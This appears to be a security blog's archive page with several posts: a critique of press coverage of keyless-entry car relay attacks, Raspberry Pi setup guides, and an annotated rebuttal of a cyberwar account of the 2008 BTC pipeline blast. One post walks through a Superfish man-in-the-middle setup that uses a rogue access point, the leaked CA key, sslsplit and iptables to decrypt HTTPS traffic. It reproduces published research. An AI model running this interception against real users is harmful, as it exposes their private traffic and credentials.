The NYT reporter gets so close to the flame and still doesn’t see the problem. For example he mentions that he dug up some researchers (e.g. Aurélien Francillon, Boris Danev and Srdjan Capkun) who had published their work in this area. Isn’t the obvious question then why a key and lock aren’t able yet to fend off an unauthorized signal boost after the problem was detailed in a 2011 paper (PDF): “Relay Attacks on Passive Keyless Entry and Start Systems in Modern Cars“?

[Figure 4 from the paper]
“Figure 4. Simplified view of the attack relaying LF (130 KHz) signals over the air by upconversion and downconversion. The relay is realized in analog to limit processing time.”

Long story short, thieves obviously have realized that keyless entry relies on a primitive, proximity-based communication channel between lock and key. The thieves may even have inside access to lock development companies and have read technical manuals that reveal assumptions like “key must be within x feet for door to unlock”. Some people would stop at x feet, but to a hacker that statement is a huge hint to try achieving far greater ranges than the system was designed for.

The simple theory, the one that makes the most sense here, is that thieves are simply boosting the signal to extend the range of the keyless entry system.

First they pull a car door handle, which initiates a key request. Normally the key would be out of range, but the thieves boost the request to reach much farther. The key could be in the owner’s pocket inside a restaurant, at a school, on a baseball field, on a park bench, or even inside a home.

Second the key receives the door signal and sends its reply.

Third the thieves pull the door handle to open the car.

Simple no?
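The three steps above can be sketched as a toy model. All names, distances, and the “nonce” here are illustrative assumptions of mine, not any real car’s protocol:

```python
# Toy model of the relay ("signal boost") attack described above.
RANGE_FT = 5  # the assumed "key must be within x feet" design limit

class Key:
    def __init__(self, distance_ft):
        self.distance_ft = distance_ft  # how far away the owner has wandered

    def respond(self, challenge, heard_at_ft):
        # Proximity is the only "authentication" in this simplified model:
        # the key answers any challenge it can hear.
        if heard_at_ft <= RANGE_FT:
            return ("unlock", challenge)
        return None

def pull_handle(key, relay_boost_ft=0):
    """Pulling the handle sends a challenge; a relay re-broadcasts it
    closer to the key, shrinking the apparent distance."""
    effective_ft = max(0, key.distance_ft - relay_boost_ft)
    reply = key.respond(challenge="nonce123", heard_at_ft=effective_ft)
    return reply is not None  # the door opens iff a valid reply comes back

owner_key = Key(distance_ft=200)                   # owner inside a restaurant
print(pull_handle(owner_key))                      # False: key out of range
print(pull_handle(owner_key, relay_boost_ft=195))  # True: relay bridges the gap
```

Note the relay never breaks any cryptography; it simply defeats the proximity assumption.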

One might suppose the thieves could press a start button and drive away but then what happens when they shut the engine off many miles from the key? That’s a whole different level of thief as I mentioned above. Proximity means risk/complexity of an attack is lowest if they just invisibly open a door and take small-value items or nothing at all.

Again, insurance companies are not going to jump into this when no car is damaged or stolen. Manufacturers likewise have little incentive to fix the issue if there is no damage. A more viable solution, given the economics and market forces, would be to encourage car owners to buy an aftermarket upgrade based on standards.

Don’t like the stereo in your car? Put in a better one aftermarket. Don’t like the seats? Upgrade those too, with better seat belts and lumbar support. Upgrade the brakes, the suspension and even put in an alarm…now ask yourself if you can find a new set of quality electronic locks that blocks the latest attacks. Where is that market?

Isn’t it strange that you cannot simply upgrade to a better electronic lock? It sounds weird, right? Where would you go to get a better key system for your car? The platform, the car itself, should allow you to upgrade to a better electronic key. Add a simple on/off switch and this attack would be defeated. This would be like installing better locks and keys in your home (explaining why our homes are not at the same level of risk from this attack). Why can’t you do this for a car?

That is the real question that a reporter in the NYT should have been asking people. Instead he found someone who suggested putting his key into a Faraday cage (blocking signals).

So now he has the bright idea to put his key in the freezer at home with the ice cream.

That shows a fundamentally flawed understanding and defeatist security. Who wants to keep their car at home just to be safe, since no one can carry a freezer around everywhere? A metal box or even a mylar bag would at least have been a nod in the right direction: safely parking your car somewhere besides home.

Basically the NYT reporter overreacts and then pats himself on the back with a silly and ineffective band-aid story. He entirely misses the opportunity to make a serious inquiry into why car manufacturers have been quiet about a long-standing key management problem. Perhaps my tweets were able to sway him towards realizing this is not as novel as he first thought.

Even better would have been if the reporter had been swayed to research why manufacturers use obfuscation instead of opening key management to a standard and free platform for innovation, supporting the safety advances from lock pick competitions. This issue is not about a Prius, a Toyota or even scary electronics entering our world. It is really about risk economics, policy and consumer rights.

Posted in Security.


SailPi: Install Sailfish OS on Raspberry Pi 2

It is surprisingly easy to install the Sailfish OS on a Raspberry Pi 2. There’s an official blog for all this and I just thought I’d share a few notes here for convenience. This took me about 5 minutes.


A: Preparation of SailPi

  1. Download sailfish image (511.5MB) provided by sailpi
  2. MD5: 29edd5770fba01af5c547a90a589a22a 
    SHA-1: 156ea9d01b862420db0b32de313e6602865cb8f9
    
  3. Extract sfos-rpi2-glacier-03272015.img.xz – I used 7-zip
  4. Write sfos-rpi2-glacier-03272015.img to SD – I used Win32DiskImager
  5. Insert the SD into the RPi2, connect the network and power up
  6. SSH to sailpi using default user:password (root:root)
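For step 2, both digests can be checked with one short script rather than separate tools. This is my own sketch (`image_digests` is a hypothetical helper name), not something from the SailPi blog:

```python
import hashlib

def image_digests(path, chunk_size=1 << 20):
    """Stream a file in chunks and return its (MD5, SHA-1) hex digests."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()

# After downloading, compare against the values published in step 2:
# md5, sha1 = image_digests("sfos-rpi2-glacier-03272015.img.xz")
# assert md5 == "29edd5770fba01af5c547a90a589a22a"
# assert sha1 == "156ea9d01b862420db0b32de313e6602865cb8f9"
```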

B: Configuration of SailPi. I simply verify I am running Sailfish (Jolla), change the root password, and change the desktop orientation to horizontal.

  1. [root@Jolla ~]# uname -a

    Linux Jolla 3.18.8-v7+ #2 SMP PREEMPT Mon Mar 9 14:11:05 UTC 2015 armv7l armv7l armv7l GNU/Linux

  2. [root@Jolla ~]# passwd
  3. [root@Jolla ~]# vi /usr/share/lipstick-glacier-home-qt5/nemovars.conf
  4. GLACIER_NATIVEORIENTATION=2


It was almost too easy.

In theory this could be the start of a home-made smartphone. The official SailPi blog talks about steps to enable bluetooth as well as adding a PiScreen and GSM board.

Posted in Security.


Antenna: Computer Viruses and Hacking (BBC 1989)

Interesting BBC program warning about a “new generation of hackers” in 1989. It’s full of soundbites about computer risk:

  • I thought it would never happen to me…
  • It’s a shock when it happens to you…
  • Everywhere I’ve worked so far it’s been there…
  • I felt as if I’d been burgled…
  • I’ve become far more cautious…
  • I think everyone needs to be careful…

Posted in History, Security.


SuperFish Exploit: Kali on Raspberry Pi 2

Robert Graham wrote a handy guide for a Superfish Exploit using Raspbian on a Raspberry Pi 2 (RP2). He mentioned wanting to run it on Kali instead so I decided to take that for a spin. Here are the steps. It took me about 20 minutes to get everything running.


A: Preparation of kali

  1. Download kali image (462.5MB) provided by @essobi
  2. Extract kali-0.1-rpi.img.xz – I used 7-zip
  3. MD5: 277ac5f1cc2321728b2e5dcbf51ac7ef 
    SHA-1: d45ddaf2b367ff5b153368df14b6a781cded09f6
    
  4. Write kali-0.1-rpi.img to SD – I used Win32DiskImager
  5. Insert the SD into the RP2, connect the network and power up
  6. SSH to kali using default user:password (root:toor)

B: Configuration of kali. In brief, I changed the default password and added a user account. I gave the new account sudo rights, then I logged out and back in as the new user. After that I updated kali for pi (rpi-update).

  1. root@kali:~$ passwd
  2. root@kali:~$ adduser davi
  3. root@kali:~$ visudo
  4. davi@kali:~$ sudo apt-get install curl
  5. davi@kali:~$ sudo apt-get update && sudo apt-get upgrade
  6. davi@kali:~$ sudo wget https://raw.githubusercontent.com/Hexxeh/rpi-update/master/rpi-update -O /usr/bin/rpi-update
  7. davi@kali:~$ sudo chmod 755 /usr/bin/rpi-update
  8. davi@kali:~$ sudo rpi-update
  9. davi@kali:~$ sudo reboot

C: Configuration of network as Robert did – follow the elinux guide for details on how to edit the files.

  1. davi@kali:~$ sudo apt-get install hostapd udhcpd
  2. davi@kali:~$ sudo vi /etc/default/udhcpd
  3. davi@kali:~$ sudo ifconfig wlan0 192.168.42.1
  4. davi@kali:~$ sudo vi /etc/network/interfaces
  5. davi@kali:~$ sudo vi /etc/hostapd/hostapd.conf
  6. davi@kali:~$ sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
  7. davi@kali:~$ sudo vi /etc/sysctl.conf
  8. davi@kali:~$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  9. davi@kali:~$ sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT
  10. davi@kali:~$ sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT
  11. davi@kali:~$ sudo sh -c "iptables-save > /etc/iptables.ipv4.nat"
  12. davi@kali:~$ sudo vi /etc/network/interfaces
  13. davi@kali:~$ sudo service hostapd start
  14. davi@kali:~$ sudo service udhcpd start
  15. davi@kali:~$ sudo update-rc.d hostapd enable
  16. davi@kali:~$ sudo update-rc.d udhcpd enable
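For orientation, here is roughly what the two files edited in steps 2 and 5 end up containing. The values below are my illustrative assumptions for a 192.168.42.0/24 access point (matching the address in step 3), not the exact settings from the elinux guide:

```python
# hostapd.conf: turns wlan0 into a WPA2 access point.
# The ssid, passphrase and channel are placeholder values.
hostapd_conf = """\
interface=wlan0
driver=nl80211
ssid=PiTestAP
hw_mode=g
channel=6
wpa=2
wpa_passphrase=ChangeMe123
wpa_key_mgmt=WPA-PSK
"""

# udhcpd config: hands out leases on 192.168.42.0/24,
# with the Pi itself (192.168.42.1) as the router.
udhcpd_conf = """\
start 192.168.42.2
end 192.168.42.20
interface wlan0
opt dns 8.8.8.8 8.8.4.4
opt subnet 255.255.255.0
opt router 192.168.42.1
"""

print(hostapd_conf)
print(udhcpd_conf)
```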

D: Configuration for Superfish Exploit. These commands follow Robert’s. I downloaded his test.pem file, duplicated it into a certificate file and then used vi to remove the redundant bits.

  1. davi@kali:~$ wget https://raw.githubusercontent.com/robertdavidgraham/pemcrack/master/test.pem
  2. davi@kali:~$ cp test.pem ca.crt
  3. davi@kali:~$ vi test.pem
  4. davi@kali:~$ vi ca.crt
  5. davi@kali:~$ openssl rsa -in test.pem -out ca.key
  6. davi@kali:~$ sudo apt-get install sslsplit
  7. davi@kali:~$ mkdir /var/log/sslsplit
  8. davi@kali:~$ sslsplit -D -l connections.log -S /var/log/sslsplit -k ca.key -c ca.crt ssl 0.0.0.0 8443 &
  9. davi@kali:~$ sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
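The vi edits in steps 3 and 4 just strip the redundant half out of each copy of the bundle. The same split can be done programmatically; this is a sketch of mine (`split_pem` is my own helper, not part of Robert’s guide), assuming standard BEGIN/END PEM markers:

```python
def split_pem(bundle_text):
    """Group the PEM blocks in a combined file by their type label."""
    blocks, current = {}, []
    for line in bundle_text.splitlines(keepends=True):
        if line.startswith("-----BEGIN") or current:
            current.append(line)
        if line.startswith("-----END"):
            label = line.strip().removeprefix("-----END ").removesuffix("-----")
            blocks.setdefault(label, []).append("".join(current))
            current = []
    return blocks

# Usage against Robert's file (after downloading it):
# parts = split_pem(open("test.pem").read())
# open("ca.crt", "w").write(parts["CERTIFICATE"][0])
# open("ca.key", "w").write(parts["RSA PRIVATE KEY"][0])
```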

Obviously Robert did all the hard work figuring this out. I’ve just tested the basics to see what it would take to set up a Kali instance. If I test further or script it I’ll update this page. Also perhaps I should mention I have a couple hardware differences from Robert’s guide:

  • RP2. Cost: $35
  • 32GB SanDisk micro SD (which is FAR larger than necessary). Cost: $18
  • Rosewill RNX-N180UBE wireless USB with external antenna, able to do “infrastructure mode”. Cost: $21

Total cost (re-purposed from other projects): $35 + $18 + $21 = $74
Total time: 20 minutes


Because I used such a large SD card, and the Kali image was so small, I also resized the partitions to make use of all that extra space.

Check starting use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs           2896624 1664684   1065084  61% /
    /dev/root        2896624 1664684   1065084  61% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     460     94476   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Resize the partition

  1. davi@kali:~$ sudo fdisk /dev/mmcblk0
  2. type “p” (print partition table and NOTE START NUMBER FOR PARTITION 2)
  3. type “d” (delete partition)
  4. type “2” (second partition)
  5. type “n” (new partition)
  6. type “p” (primary partition)
  7. type “2” (second partition)
  8. hit “enter” to select default start number (SHOULD MATCH START NUMBER NOTED)
  9. hit “enter” to select default end number
  10. type “w” (write partition table)
  11. davi@kali:~$ sudo reboot
  12. davi@kali:~$ sudo resize2fs /dev/mmcblk0p2

Check finished use percentages:

  • davi@kali:~$ df -k
  • Filesystem     1K-blocks    Used Available Use% Mounted on
    rootfs          30549476 1668420  27590636   6% /
    /dev/root       30549476 1668420  27590636   6% /
    devtmpfs          470368       0    470368   0% /dev
    tmpfs              94936     464     94472   1% /run
    tmpfs               5120       0      5120   0% /run/lock
    tmpfs             189860       0    189860   0% /run/shm
    

Posted in Security.


Cyberwar revisionism: 2008 BTC pipeline explosion

Over on a site called “Genius” I’ve made a few replies to some other people’s comments on an old story: “Mysterious ’08 Turkey Pipeline Blast Opened New Cyberwar”

Genius offers the sort of experience where you have to believe a ton of pop-up scripts is a real improvement over plain text threads. Perhaps I don’t understand properly the value of markups and votes. So I’m re-posting my comments here in a more traditional text thread format, rather than using sticky-notes hovering over a story, not least of all because it’s easier for me to read and reference later.

Thinking about the intent of Genius, if there were an interactive interface I would rather see, the power of link-analysis and social data should be put into a 3D rotating text broken into paragraphs connected by lines from sources that you can spin through in 32-bit greyscale…just kidding.

But seriously if I have to click on every paragraph of text just to read it…something more innovative might be in order, more than highlights and replies. Let me know using the “non-genius boxes” (comment section) below if you have any thoughts on a platform you prefer.

Also I suppose I should introduce my bias before I begin this out-take of Genius (my text-based interpretation of their notation system masquerading as a panel discussion):

During the 2008 pipeline explosion I was developing critical infrastructure protection (CIP) tools to help organizations achieve reliability standards of the North American Electric Reliability Council (NERC). I think that makes me someone “familiar with events” although I’m never sure what journalists mean by that phrase. I studied the events extensively and even debriefed high-level people who spoke with media at the time. And I’ve been hands-on in pen-tests and security architecture reviews for energy companies.


Bloomberg: Countries have been laying the groundwork for cyberwar operations for years, and companies have been hit recently with digital broadsides bearing hallmarks of government sponsorship.

Thomas Rid: Let’s try to be precise here — and not lump together espionage (exfiltrating data); wiping attacks (damaging data); and physical attacks (damaging hardware, mostly ICS-run). There are very different dynamics at play.

Me: Agree. Would prefer not to treat every disaster as an act of war. In the world of IT the boundary between operational issues and security events (especially because software bugs are so frequent) tends to be very fuzzy. When security teams want to investigate and treat every event as a possible attack, it tends to 1) shut down or slow commerce instead of helping protect it and 2) reduce the popularity of and trust in security teams. Imagine a city full of roadblocks and checkpoints for traffic instead of streetlights and a police force that responds to accidents. Putting in place the former would have disastrous effects on commerce.
People use terms like sophisticated and advanced to spin up worry about great unknowns in security and a looming cyberwar. Those terms should be justified and defined carefully; otherwise basic operational oversights and lack of quality in engineering will turn into roadblock city.

Bloomberg: Sony Corp.’s network was raided by hackers believed to be aligned with North Korea, and sources have said JPMorgan Chase & Co. blamed an August assault on Russian cyberspies.

Thomas Rid: In mid-February the NYT (Sanger) reported that the JPMorgan investigation has not yielded conclusive evidence.

Mat Brown: Not sure if this is the one but here’s a recent Bits Blog post on the breach http://mobile.nytimes.com/blogs/bits/2014/12/23/daily-report-simple-flaw-allowed-jp-morgan-computer-breach/

Me: “FBI officially ruled out the Russian government as a culprit” and “The Russian government has been ruled out as sponsor” http://www.reuters.com/article/2014/10/21/us-cybersecurity-jpmorgan-idUSKCN0IA01L20141021

Bloomberg: The Refahiye explosion occurred two years before Stuxnet, the computer worm that in 2010 crippled Iran’s nuclear-enrichment program, widely believed to have been deployed by Israel and the U.S.

Robert Lee: Sort of. The explosion of 2008 occurred two years before the world learned about Stuxnet. However, Stuxnet was known to have been in place years before 2010 and likely in development since around 2003-2005. Best estimates/public knowledge place Stuxnet at Natanz in 2006 or 2007.

Me: Robert is exactly right. Idaho National Labs held tests called “Aurora” (over-accelerating destroying a generator) on the morning of March 4, 2007. (https://muckrock.s3.amazonaws.com/foia_files/aurora.wmv)
By 2008 it became clear in congressional hearings that NERC had provided false information to a subcommittee in Congress on Aurora mitigation efforts by the electric sector. Tennessee Valley Authority (TVA) in particular was called vulnerable to exploit. Some called for a replacement of NERC. All before Stuxnet was “known”.

Bloomberg: National Security Agency experts had been warning the lines could be blown up from a distance, without the bother of conventional weapons. The attack was evidence other nations had the technology to wage a new kind of war, three current and former U.S. officials said.

Robert Lee: Again, three anonymous officials. Were these senior level officials that would have likely heard this kind of information in the form of PowerPoint briefings? Or were these analysts working this specific area? This report relies entirely on the evidence of “anonymous” officials and personnel. It does not seem like serious journalism.

Me: Agree. Would like to know who the experts were, given we also saw Russia dropping bombs five days later. The bombs after the fire kind of undermines the “without the bother” analysis.

Bloomberg: Stuxnet was discovered in 2010 and this was obviously deployed before that.

Robert Lee: I know and greatly like Chris Blask. But Jordan’s inclusion of his quote here in the story is odd. The timing aspect was brought up earlier and Chris did not have anything to do with this event. It appears to be an attempt to use Chris’ place in the community to add value to the anonymous sources. But Chris is just making an observation here about timing. And again, this was not deployed before Stuxnet — but Chris is right that it was done prior to the discovery of Stuxnet.

Me: Yes, although I’ll disagree slightly. As the Aurora tests were in general news stories by 2008, and Congress was debating TVA insecurity and NERC’s ability to honestly report risk, Stuxnet was framed as more unique and notable than it should have been.

Bloomberg: U.S. intelligence agencies believe the Russian government was behind the Refahiye explosion, according to two of the people briefed on the investigation.

Robert Lee: It’s not accurate to say that “U.S. intelligence agencies” believe something and then source two anonymous individuals. Again, as someone that was in the U.S. Intelligence Community it consistently frustrates me to see people claiming that U.S. intelligence agencies believe things as if they were all tightly interwoven, sharing all intelligence, and believing the same things.

Additionally, these two individuals were “briefed on the investigation” meaning they had no first hand knowledge of it. Making them non-credible sources even if they weren’t anonymous.

Me: Also interesting to note the August 28, 2008 Corner House analysis of the explosion attributed it to Kurdish Rebels (PKK). Yet not even a mention here? http://www.eca-watch.org/problems/oil_gas_mining/btc/CornerHouse_re_ECGD_and%20BTC_26aug08.pdf

[NOTE: I’m definitely going to leverage Robert’s excellent nuance statements when talking about China. Too often the press will try to paint a unified political picture, despite social scientists working to parse and explain the many different perspectives inside an agency, let alone a government or a whole nation. Understanding facets means creating better controls and more rational policy.]

Bloomberg: Although as many as 60 hours of surveillance video were erased by the hackers

Robert Lee: This is likely the most interesting piece. It is entirely plausible that the cameras were connected to the Internet. This would have been a viable way for the ‘hackers’ to enter the network. Segmentation in industrial control systems (especially older pipelines) is not common — so Internet accessible cameras could have given the intruders all the access they needed.

Me: I’m highly skeptical of this claim, from experience in the field. Video often is accidentally erased or disabled. Unless there is a verified chain of malicious destruction steps, it almost always is more likely that the surveillance video system was fragile, designed wrong or poorly run.

Bloomberg: …a single infrared camera not connected to the same network captured images of two men with laptop computers walking near the pipeline days before the explosion, according to one of the people, who has reviewed the video. The men wore black military-style uniforms without insignias, similar to the garb worn by special forces troops.

Robert Lee: This is where the story really seems to fall apart. If the hackers had full access to the network and were able to connect up to the alarms, erase the videos, etc. then what was the purpose of the two individuals? For what appears to be a highly covert operation the two individuals add an unnecessary amount of potential error. To be able to disable alerting and manipulate the process in an industrial control system you have to first understand it. This is what makes attacks so hard — you need engineering expertise AND you must understand that specific facility as they are all largely unique. If you already had all the information to do what this story is claiming — you wouldn’t have needed the two individuals to do anything. What’s worse, is that two men walking up in black jumpsuits or related type outfits in the middle of the night sounds more like engineers checking the pipeline than it does special forces. This happened “days before the explosion” which may be interesting but is hardly evidence of anything.

Me: TOTALLY AGREE. I will just add that earlier we were being told “blown up from a distance, without the bother of conventional weapons” and now we’re being told two people on the ground walking next to the pipeline. Not much distance there.

Bloomberg: “Given Russia’s strategic interest, there will always be the question of whether the country had a hand in it,” said Emily Stromquist, an energy analyst for Eurasia Group, a political risk firm based in Washington.

Robert Lee: Absolutely true. “Cyber” events do not happen in a vacuum. There is almost always geopolitical or economical interests at play.

Me: I’m holding off from any conclusion it’s a cyber event. And strategic interest to just Russia? That pipeline ran across how many conflict/war zones? There was much controversy during planning. In 2003 analysts warned that the PKK were highly likely to attack it. http://www.baku.org.uk/publications/concerns.pdf

Bloomberg: Eleven companies — including majority-owner BP, a subsidiary of the State Oil Company of Azerbaijan, Chevron Corp. and Norway’s Statoil ASA — built the line, which has carried more than two billion barrels of crude since opening in 2006.

Robert Lee: I have no idea how this is related to the infrared cameras. There is a lot of fluff entered into this article.

Me: This actually supports the argument that the pipeline was complicated both in politics and infrastructure, increasing risks. A better report would run through why BP planning would be less likely to result in disaster in this pipeline compared to their other disasters, especially given the complicated geopolitical risks.

Bloomberg: According to investigators, every mile was monitored by sensors. Pressure, oil flow and other critical indicators were fed to a central control room via a wireless monitoring system. In an extra measure, they were also sent by satellite.

Robert Lee: This would be correct. There is a massive amount of sensor and alert data that goes to any control center — pipelines especially — as safety is of chief importance and interruptions of even a few seconds in data can have horrible consequences.

Me: I believe it is more accurate to say every mile was designed to be monitored by sensors. We see quite clearly from investigations of the San Bruno, California disaster (killing at least 8 people) that documentation and monitoring of lines are imperfect even in the middle of an expensive American suburban neighborhood. http://articles.latimes.com/2011/aug/30/local/la-me-0831-san-bruno-20110831

Bloomberg: The Turkish government’s claim of mechanical failure, on the other hand, was widely disputed in media reports.

Thomas Rid: A Wikileaks State Department cable refers to this event — by 20 August 2009, BP CEO Inglis was “absolutely confident” this was a terrorist attack caused by external physical force. I haven’t had the time to dig into this, but here’s the screenshot from the cable:
Thanks to @4Dgifts

Me: It may help to put it into context of regional conflict at that time. Turkey started Operation Sun (Güneş Harekatı) attacking the PKK, lasting into March or April. By May the PKK had claimed retaliation by blowing up a pipeline between Turkey and Iran, which shut down gas exports for 5 days (http://www.dailystar.com.lb/News/Middle-East/2008/May-27/75106-explosion-cuts-iran-turkey-gas-pipeline.ashx). We should at least answer why BTC would not be a follow-up event.
And there have been several explosions since then as well, although I have not seen anyone map all the disasters over time. Figure an energy market analyst must have done one already somewhere.
And then there’s the Turkish news version of events: “Turkish official confirms BTC pipeline blast is a terrorist act” http://www.hurriyet.com.tr/english/finance/9660409.asp

Thomas Rid: Thanks — Very useful!

Bloomberg: “We have never experienced any kind of signal jamming attack or tampering on the communication lines, or computer systems,” Sagir said in an e-mail.

Robert Lee: This whole section seems to heavily dispute the assumption of this article. There isn’t really anything in the article presented to dispute this statement.

Me: Agree. The entire article goes to lengths to make a case using anonymous sources. Mr. Sagir is the best source so far and says there was no tampering detected. Going back to the surveillance cameras, perhaps they were accidentally erased or non-functioning due to error.

Bloomberg: The investigators — from Turkey, the U.K., Azerbaijan and other countries — went quietly about their business.

Robert Lee: This is extremely odd. There are not many companies who have serious experience with incident response in industrial control system scenarios. Largely because industrial control system digital forensics and incident response is so difficult. Traditional information technology networks have lots of sources of forensic data — operations technology (industrial control systems) generally do not.

The investigators coming from one team that works and has experience together adds value. The investigators coming from multiple countries sounds impressive but on the ground level actually introduces a lot of confusion and conflict as the teams have to learn to work together before they can even really get to work.

Me: Agree. The pipeline saw confusion not only in the aftermath but also in its setup and operation, increasing the chance of error or disaster.

Bloomberg: As investigators followed the trail of the failed alarm system, they found the hackers’ point of entry was an unexpected one: the surveillance cameras themselves.

Robert Lee: How? This is a critical detail. As mentioned before, incident response in industrial control systems is extremely difficult. The Industrial Control System — Computer Emergency Response Team (ICS-CERT) has published documents in the past few years talking about the difficulty and basically asking the industry to help out. One chief problem is that control systems usually do not have any ability to perform logging. Even in the rare cases that they do — it is turned off because it uses too much storage. This is extremely common in pipelines. So “investigators” seem to have found something but it is nearly outside the realm of the possible that it was out in the field. If they had any chance of finding anything it would have been on the Windows or Linux systems inside the control center itself. The problem here is that this wouldn’t have been the data needed to prove a failed alarm system.

It is very likely the investigators found malware. That happens a lot. They likely figured the malware had to be linked to the blast. This is a natural assumption but extremely flawed based on the nature of these systems and the likelihood of random malware being inside a network.

Me: Agree. Malware noticed after a disaster becomes very suspicious. I’m most curious why anyone would set up surveillance cameras for “deep into the internal network” access. Typically cameras are a completely isolated/dedicated stack of equipment with just a browser interface or even dedicated monitors/screens. Strange architecture.

Bloomberg: The presence of the attackers at the site could mean the sabotage was a blended attack, using a combination of physical and digital techniques.

Robert Lee: A blended cyber-physical attack is something that scares a lot of people in the ICS community for good reason. It combines the best of two attack vectors. The problem in this story though is that apparently it was entirely unneeded. When a nation-state wants to spend resources and talents to do an operation — especially when they don’t want to get caught — they don’t say “let’s be fancy.” Operations are run in the “path of least resistance” kind of fashion. It keeps resource expenditures down and keeps the chance of being caught low. With everything discussed as the “central element of the attack” it was entirely unneeded to do a blended attack.

Me: What really chafes my analysis is that the story is trying to build a scary “entirely remote attack” scenario while simultaneously trying to explain why two people are walking around next to the pipeline.
Also agree attackers are like water looking for cracks. Path of least resistance.

Bloomberg: The super-high pressure may have been enough on its own to create the explosion, according to two of the people familiar with the incident.

Robert Lee: Another two anonymous sources.

Me: And “familiar with the incident” is a rather low bar.

Bloomberg: Having performed extensive reconnaissance on the computer network, the infiltrators tampered with the units used to send alerts about malfunctions and leaks back to the control room. The back-up satellite signals failed, which suggested to the investigators that the attackers used sophisticated jamming equipment, according to the people familiar with the probe.

Robert Lee: If the back-up satellite signal failed in addition to alerts not coming from the field (these units are polled every few seconds or minutes depending on the system) there would have been an immediate response from the personnel unless they were entirely incompetent or not present (in which case this story would be even less likely). But jamming satellite links is an extra level of effort beyond hacking a network and understanding the process. If this was truly the work of Russian hackers they are not impressive for all the things they accomplished — they were embarrassingly bad in how many resources and methods they needed to accomplish this attack when they had multiple ways of accomplishing it with any one of the 3-4 attack vectors.

Me: Agree. The story reads to me like conventional attack, known to be used by PKK, causes fire. Then a series of problems in operations are blamed on super-sophisticated Russians. “All these systems not working are the fault of elite hackers”

Bloomberg: Investigators compared the time-stamp on the infrared image of the two people with laptops to data logs that showed the computer system had been probed by an outsider.

Robert Lee: “Probed by an outsider” reveals the system to be an Internet connected system. “Probes” is a common way to describe scans. Network scans against publicly accessible devices occur every second. There is a vast amount of research and public information on how often Internet scans take place (usually a system begins to be scanned within 3-4 seconds of being placed online). It would have been more difficult to find time-stamps in any image that did not correlate to probing.

Me: Also is there high trust in time-stamps? Accurate time is hard. Looking at the various scenarios (attackers had ability to tamper, operations did a poor job with systems) we should treat a time-stamp-based correlation as how reliable?

Bloomberg: Years later, BP claimed in documents filed in a legal dispute that it wasn’t able to meet shipping contracts after the blast due to “an act of terrorism.”

Robert Lee: Which makes sense due to the attribution the extremists claimed.

Me: I find this sentence mostly meaningless. My guess is BP was using legal or financial language because of the constraints in court. Would have to say terrorism, vandalism, etc. to speak appropriately given precedent. No lawyer wants to use a new term and establish new norms/harm when they can leverage existing work.

Bloomberg: A pipeline bombing may fit the profile of the PKK, which specializes in extortion, drug smuggling and assaults on foreign companies, said Didem Akyel Collinsworth, an Istanbul-based analyst for the International Crisis Group. But she said the PKK doesn’t have advanced hacking capabilities.

Robert Lee: This actually further disproves the article’s theory. If the PKK took credit, the company believed it to be them, the group does not possess hacking skills, and specialists believe this attack was entirely their style — then it was very likely not hacking related.

Me: Agree. Wish this pipeline explosion would be put in context of other similar regional explosions, threats from the PKK that they would attack pipelines and regional analyst warnings of PKK attacks.

Bloomberg: U.S. spy agencies probed the BTC blast independently, gathering information from foreign communications intercepts and other sources, according to one of the people familiar with the inquiry.

Robert Lee: I would hope so. There was a major explosion in a piece of critical infrastructure right before Russia invaded Georgia. If the intelligence agencies didn’t look into it they would be incompetent.

Me: Agree. Not only for defense but also for offensive knowledge, right? Would be interesting if someone said they probed it differently than the other blasts, such as the one three months earlier between Turkey and Iran.

Bloomberg: American intelligence officials believe the PKK — which according to leaked State Department cables has received arms and intelligence from Russia — may have arranged in advance with the attackers to take credit, the person said.

Robert Lee: This is all according to one, yet again, anonymous source. It is extremely far fetched. If Russia was going to go through the trouble of doing a very advanced and covert cyber operation (back in 2008 when these types of operations were even less publicly known) it would be very out of character to inform an extremist group ahead of time.

Me: Agree, although also plausible to tell a group a pipeline would be blown up without divulging method. Then the group claims credit without knowing method. The disconnect I see is Russia trying to bomb the same pipeline five days later. Why go all conventional if you’ve owned the systems and can remotely do what you like?

Bloomberg: The U.S. was interested in more than just motive. The Pentagon at the time was assessing the cyber capabilities of potential rivals, as well as weaknesses in its own defenses. Since that attack, both Iran and China have hacked into U.S. pipeline companies and gas utilities, apparently to identify vulnerabilities that could be exploited later.

Robert Lee: The Pentagon is always worried about these types of things. President Clinton published PDD-63 in 1998 talking about these types of vulnerabilities and they have been assessing and researching at least since then. There is also no evidence provided about the Iranian and Chinese hacks claimed here. It’s not that these types of things don’t happen — they most certainly do — it’s that it’s not responsible or good practice to cite events because “we all know it’s happening” instead of actual evidence.

Me: Yes, explaining major disasters that had already happened and were the focus of congressional work (2008 TVA) would be a better perspective for this section. August 2003 was a sea change in bulk power risk assessment. Talking about Iran and China seems empty/idle speculation in comparison: http://www.nerc.com/pa/rrm/ea/Pages/Blackout-August-2003.aspx

Bloomberg: As tensions over the Ukraine crisis have mounted, Russian cyberspies have been detected planting malware in U.S. systems that deliver critical services like electricity and water, according to John Hultquist, senior manager for cyber espionage threat intelligence at Dallas-based iSight Partners, which first revealed the activity in October.

Robert Lee: It’s not that I doubt this statement, or John, but this is another bad trend in journalism. Using people who have a vested interest in these kinds of stories for financial gain is a bad practice in the larger journalism community. iSight Partners offer cybersecurity services and specialize in threat intelligence. So to talk about ‘cyberspies’, ‘cyber espionage’, etc. is something they are financially motivated to hype up. I don’t doubt the credibility or validity of John’s statements but there’s a clear conflict of interest that shouldn’t be used in journalism, especially when there are no named sources with first-hand knowledge of the event.

Me: Right! Great point, Robert. Reads like free advertising for threat intelligence company X rather than trusted analysis. I would mind a lot less if a non-sales voice was presented with a dissenting view, or if the journalist added a caution about the source having a particular bias.
